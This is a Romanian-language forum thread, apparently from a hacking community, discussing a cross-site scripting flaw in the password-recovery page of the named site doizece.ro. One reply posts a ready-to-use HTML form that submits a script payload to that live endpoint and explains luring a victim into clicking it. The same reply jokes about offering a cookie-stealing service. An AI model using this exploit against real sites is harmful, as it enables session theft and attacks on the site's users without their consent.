Jump to content
iuly1997

[?]WWW.doizece.ro

Recommended Posts

Posted

1. Nu mai folosi Acunetix, ca nu inveti nimic.

2. Din cate vad acolo ai putut sa inchizi tagul mai devreme , deci probabil poti injecta si javascript macar intr-un atribut.

3. Bun, sa zicem ca il raportezi , cum trimiti e-mailul ? Ii intrebi pe cei din echipa tehnica ce ai gasit :))?

  • Active Members
Posted
1. acelui script ii mai trebuie un parametru cu fisierul :) (probabil voi face un serviciu online de steal cookies pentru toti)

2. tu furi cookieurile cui :)? ale tale?

Defapt merge exploatat in felul asta:


<form action="http://www.doizece.ro/account/password-recovery" method="POST">
<input type="hidden" name="email" value="'><script>alert(1)</script>" />
<input type="hidden" name="submit" value="Trimite" />
<input type="submit" value="XSS Click Here" />
</form>

Codul HTML il stochezi pe un site,in inputul email se afla vectorul xss care v-a fi trimis pe pagina lor.Daca victima da click pe acel buton vectorul xss v-a fi trimis pe pagina doizece si executat:)

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...